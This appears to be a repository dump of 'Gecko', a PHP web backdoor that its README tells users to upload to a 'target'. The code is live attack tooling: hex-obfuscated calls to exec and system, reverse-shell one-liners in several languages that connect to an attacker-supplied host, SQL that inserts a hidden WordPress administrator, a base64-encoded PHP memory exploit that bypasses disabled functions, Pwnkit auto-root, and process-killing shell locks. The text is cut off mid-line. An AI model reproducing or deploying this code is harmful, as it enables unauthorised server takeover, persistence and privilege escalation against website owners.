├── LICENSE ├── README.md ├── coding.png ├── download (3).gif ├── folders.png ├── gecko-icon.gif ├── gecko-litespeed.php ├── gecko-login.php ├── gecko-new.php ├── gecko-old.php ├── gecko1.png ├── image.png ├── marriage.png ├── s.gif └── sarusai.gif /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 MrMad 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 |

Gecko Web Backdoor

3 |
4 | 5 |
6 | 7 | ![licence](https://img.shields.io/badge/LICENE-GPL2.0-ebcb8b?style=flat-square) 8 | ![version](https://img.shields.io/badge/VERSION-1.0.2-a3be8c?style=flat-square) 9 | 10 |
11 |
12 | 13 | 14 | 15 | * Bypass 403 16 | * Bypass 404 17 | * Bypass 500 18 | * Bypass litespeed 19 | * Bypass blankphp 20 | * Bypass downloaded 21 | 22 | 23 | 24 |

Features

25 | 26 | 27 | 28 | * Linux Exploit Suggester 29 | * Backdoor Destroyer 30 | * Auto Root > Pwnkit 31 | * Lock File 32 | * Lock Shell 33 | * Add UserName > ROOT EDITION 34 | * Add UNLOCK SHELL 35 | * Add Backconnect 36 | * Add Hash identifier 37 | * Add adminer 38 | * Add Cpanel RESET 39 | * Wordpress add admin user 40 | * Add Compressor zip 41 | * Add Decomporessor Archive 42 | * No detect shell 43 | 44 | 45 | 46 | 47 |

Fixed

48 | 49 | 50 | 51 | * Fixed Bug On Backdoor Destroyer 52 | * Fixed Bug On Auto Root! 53 | 54 | 55 | 56 |

Read this

57 | 58 | 59 | 60 | I'm not responsible for what you guys do using my tools!, Segala macam backdoor yang membawa gecko dll, gecko asli hanya di github MadExploits 61 | 62 | if you want to using auto root please type `root` for older version `gecko-old.php` 63 | 64 | Upload this `gecko.php` To Your Target! 65 | 66 | 67 |
68 | 69 |
70 | 71 | 72 |
73 |

Support me :

74 | 75 |
76 | 77 | 78 | Copyright (c) 2023 MrMad 79 | 80 | -------------------------------------------------------------------------------- /coding.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MadExploits/Gecko/5f2750be58315ce6f9bc8dbb97af4667fe4d322d/coding.png -------------------------------------------------------------------------------- /download (3).gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MadExploits/Gecko/5f2750be58315ce6f9bc8dbb97af4667fe4d322d/download (3).gif -------------------------------------------------------------------------------- /folders.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MadExploits/Gecko/5f2750be58315ce6f9bc8dbb97af4667fe4d322d/folders.png -------------------------------------------------------------------------------- /gecko-icon.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MadExploits/Gecko/5f2750be58315ce6f9bc8dbb97af4667fe4d322d/gecko-icon.gif -------------------------------------------------------------------------------- /gecko-litespeed.php: -------------------------------------------------------------------------------- 1 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 45 | 46 | 47 | 48 |
49 |
50 |   51 |
52 |
53 | 54 | 55 | 56 | 57 | 58 | Gunakan hash PASSWORD_DEFAULT Anda dapat menggunakan situs ini https://phppasswordhash.com/ untuk menghasilkan kata sandi Anda 64 | 65 | if (isset($_POST['pass']) && password_verify($_POST['pass'], $stored_hashed_password)) { 66 | $_SESSION['authenticated'] = true; 67 | } else { 68 | show_login_page(); 69 | } 70 | } 71 | ?> 72 | 0 84 | '676c6f62', # gl ob => 1 85 | '69735f646972', # is_d ir => 2 86 | '69735f66696c65', # is_ file => 3 87 | '69735f7772697461626c65', # is_wr iteable => 4 88 | '69735f7265616461626c65', # is_re adble => 5 89 | '66696c657065726d73', # fileper ms => 6 90 | '66696c65', # f ile => 7 91 | '7068705f756e616d65', # php_unam e => 8 92 | '6765745f63757272656e745f75736572', # getc urrentuser => 9 93 | '68746d6c7370656369616c6368617273', # html special => 10 94 | '66696c655f6765745f636f6e74656e7473', # fil e_get_contents => 11 95 | '6d6b646972', # mk dir => 12 96 | '746f756368', # to uch => 13 97 | '6368646972', # ch dir => 14 98 | '72656e616d65', # ren ame => 15 99 | '65786563', # exe c => 16 100 | '7061737374687275', # pas sthru => 17 101 | '73797374656d', # syst em => 18 102 | '7368656c6c5f65786563', # sh ell_exec => 19 103 | '706f70656e', # p open => 20 104 | '70636c6f7365', # pcl ose => 21 105 | '73747265616d5f6765745f636f6e74656e7473', # stre amgetcontents => 22 106 | '70726f635f6f70656e', # p roc_open => 23 107 | '756e6c696e6b', # un link => 24 108 | '726d646972', # rmd ir => 25 109 | '666f70656e', # fop en => 26 110 | '66636c6f7365', # fcl ose => 27 111 | '66696c655f7075745f636f6e74656e7473', # file_put_c ontents => 28 112 | '6d6f76655f75706c6f616465645f66696c65', # move_up loaded_file => 29 113 | '63686d6f64', # ch mod => 30 114 | '7379735f6765745f74656d705f646972', # temp _dir => 31 115 | '6261736536345F6465636F6465', # => bas e6 4 _decode => 32 116 | '6261736536345F656E636F6465', # => ba se6 4_ encode => 33 117 | ]; 118 | $hitung_array = count($Array); 119 | for ($i = 0; $i < $hitung_array; $i++) { 120 | $fungsi[] = unx($Array[$i]); 121 | } 122 | 123 | if (isset($_GET['d'])) { 124 | $cdir = unx($_GET['d']); 125 | $fungsi[14]($cdir); 126 | } else { 127 | $cdir = $fungsi[0](); 128 | } 129 | 130 | function file_ext($file) 131 | { 132 | if (mime_content_type($file) == 'image/png' or mime_content_type($file) == 'image/jpeg') { 133 | return ''; 134 | } else if (mime_content_type($file) == 'application/x-httpd-php' or mime_content_type($file) == 'text/html') { 135 | return ''; 136 | } else if (mime_content_type($file) == 'text/javascript') { 137 | return ''; 138 | } else if (mime_content_type($file) == 'application/zip' or mime_content_type($file) == 'application/x-7z-compressed') { 139 | return ''; 140 | } else if (mime_content_type($file) == 'text/plain') { 141 | return ''; 142 | } else if (mime_content_type($file) == 'application/pdf') { 143 | return ''; 144 | } else { 145 | return ''; 146 | } 147 | } 148 | 149 | function download($file) 150 | { 151 | 152 | if (file_exists($file)) { 153 | header('Content-Description: File Transfer'); 154 | header('Content-Type: application/octet-stream'); 155 | header('Content-Disposition: attachment; filename=' . basename($file)); 156 | header('Content-Transfer-Encoding: binary'); 157 | header('Expires: 0'); 158 | header('Cache-Control: must-revalidate'); 159 | header('Pragma: public'); 160 | header('Content-Length: ' . filesize($file)); 161 | ob_clean(); 162 | flush(); 163 | readfile($file); 164 | exit; 165 | } 166 | } 167 | 168 | if ($_GET['don'] == true) { 169 | $FilesDon = download(unx($_GET['don'])); 170 | } 171 | ?> 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | Gecko [ <?= $_SERVER['SERVER_NAME']; ?> ] 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 611 | 612 | 613 | 614 |
615 | 628 |
629 |
630 | 648 |
649 | 650 | 655 | 656 |
657 | 661 |
662 | $val) { 669 | if ($val == '' && $id == 0) { 670 | echo '  / '; 671 | continue; 672 | } 673 | if ($val == '') continue; 674 | echo '' . $val . ' / ' . ''; 680 | } 681 | echo "[ HOME SHELL ] "; 682 | ?> 683 |
684 | 685 | 686 | 687 | 688 | 689 | 690 | 691 | 692 | 693 | 694 | 695 | 696 | 697 | 698 | 699 | 700 | 701 | 702 | 711 | 712 | 713 | 714 | 715 | 716 | 717 | 718 | 719 | 720 | 721 | 722 | 731 | 732 | 733 | 734 | 735 | 736 | 737 |
NameSizePermissionAction
  ">[ DIR ] 703 | '; 705 | } elseif (!$fungsi[5]($fungsi[0]() . '/' . $_D)) { 706 | echo ''; 707 | } 708 | echo perms($fungsi[0]() . '/' . $_D); 709 | ?> 710 |  
   723 | '; 725 | } elseif (!is_readable($fungsi[0]() . '/' . $_F)) { 726 | echo ''; 727 | } 728 | echo perms($fungsi[0]() . '/' . $_F); 729 | ?> 730 |   
738 |
739 | 744 | 745 | 746 | 747 | 748 |
749 |
750 |
751 |

${this.title}

752 |
753 |
754 |
755 |
756 | 757 |
758 |   759 |
760 | 761 |
762 |
763 |
764 |
765 | 766 |
767 |
768 |
769 |

:: Cpanel Reset

770 |
771 |
772 |
773 |
774 | 775 | 776 |
777 |
778 |  Close 779 |
780 | 781 |
782 |
783 | 784 | 785 |
786 |
787 |
788 |

789 |
CREATE WORDPRESS ADMIN PASSWORD
790 |

791 |
792 |
793 |
794 |
795 | 796 | 797 |

798 | 799 |

800 | 801 |

802 | 803 |

804 |
805 |

806 | 807 |

808 | 809 |

810 |
811 |
812 |  Close 813 |
814 | 815 |
816 |
817 | 818 | 819 |
820 |
821 |
822 |

:: Backconnect

823 |
824 |
825 |
826 | 838 | 839 |

840 | 841 |
842 |  Close 843 |
844 | 845 |
846 |
847 | 848 | 849 |
850 |
851 |
852 |

:: PHP Mailer

853 |
854 |
855 |
856 |
857 | 858 |
859 | 860 |
861 |
862 | 863 |

864 | 865 |

866 | 867 |
868 |
869 |  Close 870 |
871 | 872 |
873 |
874 | 875 | 876 |
877 |
878 |
879 |

  Code Editor :

880 |
881 |
882 |
883 | 884 |
885 |   886 |
887 |
888 |
889 |
890 |
891 | 892 | 893 |
894 |
895 |
896 |
    897 |
  •  TERMINAL
    • 898 |
    • 899 |
900 |
901 |
902 | 907 |
908 |
    909 |
  • " autofocus>
    • 910 |
    • 911 |
912 |
913 |
914 |
915 |
916 | 917 | 918 |
919 |
920 |
921 |
    922 |
  •  AUTO ROOT
    • 923 |
    • 924 |
925 |
926 |
927 | 942 |
943 |
    944 |
  • " autofocus>
    • 945 |
    • 946 |
947 |
948 |
949 |
950 |
951 | 952 | 953 |
954 |
955 |
956 |

Rename :

957 |
958 |
959 |
960 | 961 |
962 |   963 |
964 |
965 |
966 |
967 |
968 |
969 | 970 | 971 |
972 |
973 |
974 |

Change Permission :

975 |
976 |
977 |
978 | 979 |
980 |   981 |
982 |
983 |
984 |
985 |
986 |
987 | 988 | 1059 | 1060 | 1061 | 1062 | connect_error) { 1075 | failed(); 1076 | die("Error Cug : " . $conn->connect_error); 1077 | } 1078 | 1079 | $sql = "INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES ('$wp_user', '$wp_pass', 'MadExploits', '', '', NOW(), '', 0, 'MadExploits')"; 1080 | 1081 | $sqltakeuserid = "SELECT ID FROM wp_users WHERE user_login = '$wp_user'"; 1082 | 1083 | if ($conn->query($sql) === TRUE && $conn->query($sqltakeuserid)) { 1084 | $result = $conn->query($sqltakeuserid); 1085 | 1086 | if ($result->num_rows > 0) { 1087 | $row = $result->fetch_assoc(); 1088 | $user_id = $row["ID"]; 1089 | 1090 | $sqlusermeta = "INSERT INTO wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES ('', $user_id, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')"; 1091 | 1092 | if ($conn->query($sqlusermeta) === TRUE) { 1093 | Success(); 1094 | } else { 1095 | echo "Error: " . $sqlusermeta . "\n" . $conn->error; 1096 | } 1097 | } else { 1098 | echo "User tidak ditemukan.\n"; 1099 | } 1100 | 1101 | Success(); 1102 | } else { 1103 | echo "Error: " . $sql . "\n" . $conn->error; 1104 | } 1105 | 1106 | $conn->close(); 1107 | } 1108 | 1109 | 1110 | 1111 | if (isset($_GET['unlockshell'])) { 1112 | if (cmd("killall -9 php") && cmd("pkill -9 php")) { 1113 | success(); 1114 | } else { 1115 | failed(); 1116 | } 1117 | } 1118 | 1119 | if (isset($_POST['submit-bc'])) { 1120 | $HostServer = $_POST['backconnect-host']; 1121 | $PortServer = $_POST['backconnect-port']; 1122 | if ($_POST['gecko-bc'] == "perl") { 1123 | echo cmd('perl -e \'use Socket;$i="' . $HostServer . '";$p=' . $PortServer . ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");' . $fungsi[16] . '("/bin/sh -i");};\''); 1124 | } else if ($_POST['gecko-bc'] == "python") { 1125 | echo cmd('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' . $HostServer . '",' . $PortServer . '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''); 1126 | } else if ($_POST['gecko-bc'] == "ruby") { 1127 | echo cmd('ruby -rsocket -e\'f=TCPSocket.open("' . $HostServer . '",' . $PortServer . ').to_i;' . $fungsi[16] . ' sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\''); 1128 | } else if ($_POST['gecko-bc'] == "bash") { 1129 | echo cmd('bash -i >& /dev/tcp/' . $HostServer . '/' . $PortServer . ' 0>&1'); 1130 | } else if ($_POST['gecko-bc'] == "php") { 1131 | echo cmd('php -r \'$sock=fsockopen("' . $HostServer . '",' . $PortServer . ');' . $fungsi[16] . '("/bin/sh -i <&3 >&3 2>&3");\''); 1132 | } else if ($_POST['gecko-bc'] == "nc") { 1133 | echo cmd('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' . $HostServer . ' ' . $PortServer . ' >/tmp/f'); 1134 | } else if ($_POST['gecko-bc'] == "sh") { 1135 | echo cmd('sh -i >& /dev/tcp/' . $HostServer . '/' . $PortServer . ' 0>&1'); 1136 | } else if ($_POST['gecko-bc'] == "xterm") { 1137 | echo cmd('xterm -display ' . $HostServer . ':' . $PortServer); 1138 | } else if ($_POST['gecko-bc'] == "golang") { 1139 | echo cmd('echo \'package main;import"os/' . $fungsi[16] . '";import"net";func main(){c,_:=net.Dial("tcp","' . $HostServer . ':' . $PortServer . '");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}\' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go'); 1140 | } 1141 | } 1142 | 1143 | 1144 | if ($_GET['terminal'] == "bypasser") { 1145 | if (!$fungsi[3]('.term-bypass') && $fungsi[4]($fungsi[0]())) { 1146 | $connt = 'PD9waHAKZnVuY3Rpb24gcHduKCRjbWRkKSB7CiAgICBnbG9iYWwgJGFiYywgJGhlbHBlciwgJGJhY2t0cmFjZTsKCiAgICBjbGFzcyBWdWxuIHsKICAgICAgICBwdWJsaWMgJGE7CiAgICAgICAgcHVibGljIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKSB7IAogICAgICAgICAgICBnbG9iYWwgJGJhY2t0cmFjZTsgCiAgICAgICAgICAgIHVuc2V0KCR0aGlzLT5hKTsKICAgICAgICAgICAgJGJhY2t0cmFjZSA9IChuZXcgRXhjZXB0aW9uKS0+Z2V0VHJhY2UoKTsgIyA7KQogICAgICAgICAgICBpZighaXNzZXQoJGJhY2t0cmFjZVsxXVsnYXJncyddKSkgeyAjIFBIUCA+PSA3LjQKICAgICAgICAgICAgICAgICRiYWNrdHJhY2UgPSBkZWJ1Z19iYWNrdHJhY2UoKTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIH0KCiAgICBjbGFzcyBIZWxwZXIgewogICAgICAgIHB1YmxpYyAkYSwgJGIsICRjLCAkZDsKICAgIH0KCiAgICBmdW5jdGlvbiBzdHIycHRyKCYkc3RyLCAkcCA9IDAsICRzID0gOCkgewogICAgICAgICRhZGRyZXNzID0gMDsKICAgICAgICBmb3IoJGogPSAkcy0xOyAkaiA+PSAwOyAkai0tKSB7CiAgICAgICAgICAgICRhZGRyZXNzIDw8PSA4OwogICAgICAgICAgICAkYWRkcmVzcyB8PSBvcmQoJHN0clskcCskal0pOwogICAgICAgIH0KICAgICAgICByZXR1cm4gJGFkZHJlc3M7CiAgICB9CgogICAgZnVuY3Rpb24gcHRyMnN0cigkcHRyLCAkbSA9IDgpIHsKICAgICAgICAkb3V0ID0gIiI7CiAgICAgICAgZm9yICgkaT0wOyAkaSA8ICRtOyAkaSsrKSB7CiAgICAgICAgICAgICRvdXQgLj0gY2hyKCRwdHIgJiAweGZmKTsKICAgICAgICAgICAgJHB0ciA+Pj0gODsKICAgICAgICB9CiAgICAgICAgcmV0dXJuICRvdXQ7CiAgICB9CgogICAgZnVuY3Rpb24gd3JpdGUoJiRzdHIsICRwLCAkdiwgJG4gPSA4KSB7CiAgICAgICAgJGkgPSAwOwogICAgICAgIGZvcigkaSA9IDA7ICRpIDwgJG47ICRpKyspIHsKICAgICAgICAgICAgJHN0clskcCArICRpXSA9IGNocigkdiAmIDB4ZmYpOwogICAgICAgICAgICAkdiA+Pj0gODsKICAgICAgICB9CiAgICB9CgogICAgZnVuY3Rpb24gbGVhaygkYWRkciwgJHAgPSAwLCAkcyA9IDgpIHsKICAgICAgICBnbG9iYWwgJGFiYywgJGhlbHBlcjsKICAgICAgICB3cml0ZSgkYWJjLCAweDY4LCAkYWRkciArICRwIC0gMHgxMCk7CiAgICAgICAgJGxlYWsgPSBzdHJsZW4oJGhlbHBlci0+YSk7CiAgICAgICAgaWYoJHMgIT0gOCkgeyAkbGVhayAlPSAyIDw8ICgkcyAqIDgpIC0gMTsgfQogICAgICAgIHJldHVybiAkbGVhazsKICAgIH0KCiAgICBmdW5jdGlvbiBwYXJzZV9lbGYoJGJhc2UpIHsKICAgICAgICAkZV90eXBlID0gbGVhaygkYmFzZSwgMHgxMCwgMik7CgogICAgICAgICRlX3Bob2ZmID0gbGVhaygkYmFzZSwgMHgyMCk7CiAgICAgICAgJGVfcGhlbnRzaXplID0gbGVhaygkYmFzZSwgMHgzNiwgMik7CiAgICAgICAgJGVfcGhudW0gPSBsZWFrKCRiYXNlLCAweDM4LCAyKTsKCiAgICAgICAgZm9yKCRpID0gMDsgJGkgPCAkZV9waG51bTsgJGkrKykgewogICAgICAgICAgICAkaGVhZGVyID0gJGJhc2UgKyAkZV9waG9mZiArICRpICogJGVfcGhlbnRzaXplOwogICAgICAgICAgICAkcF90eXBlICA9IGxlYWsoJGhlYWRlciwgMCwgNCk7CiAgICAgICAgICAgICRwX2ZsYWdzID0gbGVhaygkaGVhZGVyLCA0LCA0KTsKICAgICAgICAgICAgJHBfdmFkZHIgPSBsZWFrKCRoZWFkZXIsIDB4MTApOwogICAgICAgICAgICAkcF9tZW1zeiA9IGxlYWsoJGhlYWRlciwgMHgyOCk7CgogICAgICAgICAgICBpZigkcF90eXBlID09IDEgJiYgJHBfZmxhZ3MgPT0gNikgeyAjIFBUX0xPQUQsIFBGX1JlYWRfV3JpdGUKICAgICAgICAgICAgICAgICMgaGFuZGxlIHBpZQogICAgICAgICAgICAgICAgJGRhdGFfYWRkciA9ICRlX3R5cGUgPT0gMiA/ICRwX3ZhZGRyIDogJGJhc2UgKyAkcF92YWRkcjsKICAgICAgICAgICAgICAgICRkYXRhX3NpemUgPSAkcF9tZW1zejsKICAgICAgICAgICAgfSBlbHNlIGlmKCRwX3R5cGUgPT0gMSAmJiAkcF9mbGFncyA9PSA1KSB7ICMgUFRfTE9BRCwgUEZfUmVhZF9leGVjCiAgICAgICAgICAgICAgICAkdGV4dF9zaXplID0gJHBfbWVtc3o7CiAgICAgICAgICAgIH0KICAgICAgICB9CgogICAgICAgIGlmKCEkZGF0YV9hZGRyIHx8ICEkdGV4dF9zaXplIHx8ICEkZGF0YV9zaXplKQogICAgICAgICAgICByZXR1cm4gZmFsc2U7CgogICAgICAgIHJldHVybiBbJGRhdGFfYWRkciwgJHRleHRfc2l6ZSwgJGRhdGFfc2l6ZV07CiAgICB9CgogICAgZnVuY3Rpb24gZ2V0X2Jhc2ljX2Z1bmNzKCRiYXNlLCAkZWxmKSB7CiAgICAgICAgbGlzdCgkZGF0YV9hZGRyLCAkdGV4dF9zaXplLCAkZGF0YV9zaXplKSA9ICRlbGY7CiAgICAgICAgZm9yKCRpID0gMDsgJGkgPCAkZGF0YV9zaXplIC8gODsgJGkrKykgewogICAgICAgICAgICAkbGVhayA9IGxlYWsoJGRhdGFfYWRkciwgJGkgKiA4KTsKICAgICAgICAgICAgaWYoJGxlYWsgLSAkYmFzZSA+IDAgJiYgJGxlYWsgLSAkYmFzZSA8ICRkYXRhX2FkZHIgLSAkYmFzZSkgewogICAgICAgICAgICAgICAgJGRlcmVmID0gbGVhaygkbGVhayk7CiAgICAgICAgICAgICAgICAjICdjb25zdGFudCcgY29uc3RhbnQgY2hlY2sKICAgICAgICAgICAgICAgIGlmKCRkZXJlZiAhPSAweDc0NmU2MTc0NzM2ZTZmNjMpCiAgICAgICAgICAgICAgICAgICAgY29udGludWU7CiAgICAgICAgICAgIH0gZWxzZSBjb250aW51ZTsKCiAgICAgICAgICAgICRsZWFrID0gbGVhaygkZGF0YV9hZGRyLCAoJGkgKyA0KSAqIDgpOwogICAgICAgICAgICBpZigkbGVhayAtICRiYXNlID4gMCAmJiAkbGVhayAtICRiYXNlIDwgJGRhdGFfYWRkciAtICRiYXNlKSB7CiAgICAgICAgICAgICAgICAkZGVyZWYgPSBsZWFrKCRsZWFrKTsKICAgICAgICAgICAgICAgICMgJ2JpbjJoZXgnIGNvbnN0YW50IGNoZWNrCiAgICAgICAgICAgICAgICBpZigkZGVyZWYgIT0gMHg3ODY1NjgzMjZlNjk2MikKICAgICAgICAgICAgICAgICAgICBjb250aW51ZTsKICAgICAgICAgICAgfSBlbHNlIGNvbnRpbnVlOwoKICAgICAgICAgICAgcmV0dXJuICRkYXRhX2FkZHIgKyAkaSAqIDg7CiAgICAgICAgfQogICAgfQoKICAgIGZ1bmN0aW9uIGdldF9iaW5hcnlfYmFzZSgkYmluYXJ5X2xlYWspIHsKICAgICAgICAkYmFzZSA9IDA7CiAgICAgICAgJHN0YXJ0ID0gJGJpbmFyeV9sZWFrICYgMHhmZmZmZmZmZmZmZmZmMDAwOwogICAgICAgIGZvcigkaSA9IDA7ICRpIDwgMHgxMDAwOyAkaSsrKSB7CiAgICAgICAgICAgICRhZGRyID0gJHN0YXJ0IC0gMHgxMDAwICogJGk7CiAgICAgICAgICAgICRsZWFrID0gbGVhaygkYWRkciwgMCwgNyk7CiAgICAgICAgICAgIGlmKCRsZWFrID09IDB4MTAxMDI0NjRjNDU3ZikgeyAjIEVMRiBoZWFkZXIKICAgICAgICAgICAgICAgIHJldHVybiAkYWRkcjsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIH0KCiAgICBmdW5jdGlvbiBnZXRfc3lzdGVtKCRiYXNpY19mdW5jcykgewogICAgICAgICRhZGRyID0gJGJhc2ljX2Z1bmNzOwogICAgICAgIGRvIHsKICAgICAgICAgICAgJGZfZW50cnkgPSBsZWFrKCRhZGRyKTsKICAgICAgICAgICAgJGZfbmFtZSA9IGxlYWsoJGZfZW50cnksIDAsIDYpOwoKICAgICAgICAgICAgaWYoJGZfbmFtZSA9PSAweDZkNjU3NDczNzk3MykgeyAjIHN5c3RlbQogICAgICAgICAgICAgICAgcmV0dXJuIGxlYWsoJGFkZHIgKyA4KTsKICAgICAgICAgICAgfQogICAgICAgICAgICAkYWRkciArPSAweDIwOwogICAgICAgIH0gd2hpbGUoJGZfZW50cnkgIT0gMCk7CiAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgfQoKICAgIGZ1bmN0aW9uIHRyaWdnZXJfdWFmKCRhcmcpIHsKICAgICAgICAjIHN0cl9zaHVmZmxlIHByZXZlbnRzIG9wY2FjaGUgc3RyaW5nIGludGVybmluZwogICAgICAgICRhcmcgPSBzdHJfc2h1ZmZsZShzdHJfcmVwZWF0KCdBJywgNzkpKTsKICAgICAgICAkdnVsbiA9IG5ldyBWdWxuKCk7CiAgICAgICAgJHZ1bG4tPmEgPSAkYXJnOwogICAgfQoKICAgIGlmKHN0cmlzdHIoUEhQX09TLCAnV0lOJykpIHsKICAgICAgICBkaWUoJ1RoaXMgUG9DIGlzIGZvciAqbml4IHN5c3RlbXMgb25seS4nKTsKICAgIH0KCiAgICAkbl9hbGxvYyA9IDEwOyAjIGluY3JlYXNlIHRoaXMgdmFsdWUgaWYgVUFGIGZhaWxzCiAgICAkY29udGlndW91cyA9IFtdOwogICAgZm9yKCRpID0gMDsgJGkgPCAkbl9hbGxvYzsgJGkrKykKICAgICAgICAkY29udGlndW91c1tdID0gc3RyX3NodWZmbGUoc3RyX3JlcGVhdCgnQScsIDc5KSk7CgogICAgdHJpZ2dlcl91YWYoJ3gnKTsKICAgICRhYmMgPSAkYmFja3RyYWNlWzFdWydhcmdzJ11bMF07CgogICAgJGhlbHBlciA9IG5ldyBIZWxwZXI7CiAgICAkaGVscGVyLT5iID0gZnVuY3Rpb24gKCR4KSB7IH07CgogICAgaWYoc3RybGVuKCRhYmMpID09IDc5IHx8IHN0cmxlbigkYWJjKSA9PSAwKSB7CiAgICAgICAgZGllKCJVQUYgZmFpbGVkIik7CiAgICB9CgogICAgIyBsZWFrcwogICAgJGNsb3N1cmVfaGFuZGxlcnMgPSBzdHIycHRyKCRhYmMsIDApOwogICAgJHBocF9oZWFwID0gc3RyMnB0cigkYWJjLCAweDU4KTsKICAgICRhYmNfYWRkciA9ICRwaHBfaGVhcCAtIDB4Yzg7CgogICAgIyBmYWtlIHZhbHVlCiAgICB3cml0ZSgkYWJjLCAweDYwLCAyKTsKICAgIHdyaXRlKCRhYmMsIDB4NzAsIDYpOwoKICAgICMgZmFrZSByZWZlcmVuY2UKICAgIHdyaXRlKCRhYmMsIDB4MTAsICRhYmNfYWRkciArIDB4NjApOwogICAgd3JpdGUoJGFiYywgMHgxOCwgMHhhKTsKCiAgICAkY2xvc3VyZV9vYmogPSBzdHIycHRyKCRhYmMsIDB4MjApOwoKICAgICRiaW5hcnlfbGVhayA9IGxlYWsoJGNsb3N1cmVfaGFuZGxlcnMsIDgpOwogICAgaWYoISgkYmFzZSA9IGdldF9iaW5hcnlfYmFzZSgkYmluYXJ5X2xlYWspKSkgewogICAgICAgIGRpZSgiQ291bGRuJ3QgZGV0ZXJtaW5lIGJpbmFyeSBiYXNlIGFkZHJlc3MiKTsKICAgIH0KCiAgICBpZighKCRlbGYgPSBwYXJzZV9lbGYoJGJhc2UpKSkgewogICAgICAgIGRpZSgiQ291bGRuJ3QgcGFyc2UgRUxGIGhlYWRlciIpOwogICAgfQoKICAgIGlmKCEoJGJhc2ljX2Z1bmNzID0gZ2V0X2Jhc2ljX2Z1bmNzKCRiYXNlLCAkZWxmKSkpIHsKICAgICAgICBkaWUoIkNvdWxkbid0IGdldCBiYXNpY19mdW5jdGlvbnMgYWRkcmVzcyIpOwogICAgfQoKICAgIGlmKCEoJHppZl9zeXN0ZW0gPSBnZXRfc3lzdGVtKCRiYXNpY19mdW5jcykpKSB7CiAgICAgICAgZGllKCJDb3VsZG4ndCBnZXQgemlmX3N5c3RlbSBhZGRyZXNzIik7CiAgICB9CgogICAgIyBmYWtlIGNsb3N1cmUgb2JqZWN0CiAgICAkZmFrZV9vYmpfb2Zmc2V0ID0gMHhkMDsKICAgIGZvcigkaSA9IDA7ICRpIDwgMHgxMTA7ICRpICs9IDgpIHsKICAgICAgICB3cml0ZSgkYWJjLCAkZmFrZV9vYmpfb2Zmc2V0ICsgJGksIGxlYWsoJGNsb3N1cmVfb2JqLCAkaSkpOwogICAgfQoKICAgICMgcHduCiAgICB3cml0ZSgkYWJjLCAweDIwLCAkYWJjX2FkZHIgKyAkZmFrZV9vYmpfb2Zmc2V0KTsKICAgIHdyaXRlKCRhYmMsIDB4ZDAgKyAweDM4LCAxLCA0KTsgIyBpbnRlcm5hbCBmdW5jIHR5cGUKICAgIHdyaXRlKCRhYmMsIDB4ZDAgKyAweDY4LCAkemlmX3N5c3RlbSk7ICMgaW50ZXJuYWwgZnVuYyBoYW5kbGVyCgogICAgKCRoZWxwZXItPmIpKCRjbWRkKTsKfQ=='; 1147 | $fungsi[28](".term-bypass", $fungsi[32]($connt)); 1148 | } 1149 | } 1150 | 1151 | 1152 | if (isset($_GET['lockshell'])) { 1153 | $curFile = trim(basename($_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"])); 1154 | $TmpNames = $fungsi[31](); 1155 | if (file_exists($TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-handler')) && file_exists($TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text'))) { 1156 | cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text')); 1157 | cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-handler')); 1158 | } 1159 | mkdir($TmpNames . "/.sessions"); 1160 | cmd("cp $curFile " . $TmpNames . "/.sessions/." 